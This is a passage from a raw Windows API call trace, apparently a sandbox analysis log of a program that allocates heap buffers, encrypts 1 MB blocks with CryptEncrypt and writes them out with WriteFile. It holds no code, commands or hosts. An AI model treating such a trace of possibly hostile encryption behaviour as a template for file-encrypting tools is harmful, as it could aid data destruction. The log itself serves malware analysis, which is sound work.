hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0202.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0202.072] CryptEncrypt (in: hKey=0xa87250, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x118b020*, pdwDataLen=0x8cef60*=0x100000, dwBufLen=0x100000 | out: pbData=0x118b020*, pdwDataLen=0x8cef60*=0x100000) returned 1 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0202.147] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.148] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0202.148] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0202.149] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0202.150] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0202.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0202.150] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0202.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0202.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0202.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9779f8 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0202.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0202.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0202.151] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0202.151] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0202.152] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0202.153] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cc8 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0202.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0202.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0202.154] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0202.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0202.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0202.154] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0202.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0202.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0202.155] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0202.155] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.155] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x129c020 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0202.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0202.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0202.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x13ae020 [0202.381] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x129c020 | out: hHeap=0x970000) returned 1 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0202.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0202.388] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0202.388] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0202.388] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0202.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0202.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0202.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.389] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0202.389] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0202.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0202.389] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0202.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.389] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0202.389] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0202.637] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0202.637] TranslateMessage (lpMsg=0x8cf708) returned 0 [0202.637] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0202.638] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0202.638] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0202.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0202.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0202.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0202.638] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0202.638] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0202.638] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0202.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0202.639] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xf6a020 [0202.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0202.669] WriteFile (in: hFile=0x2a0, lpBuffer=0xf6a020*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0xf6a020*, lpNumberOfBytesWritten=0x8cf5e4*=0x100000, lpOverlapped=0x0) returned 1 [0202.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0202.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf6a020 | out: hHeap=0x970000) returned 1 [0202.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0202.710] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 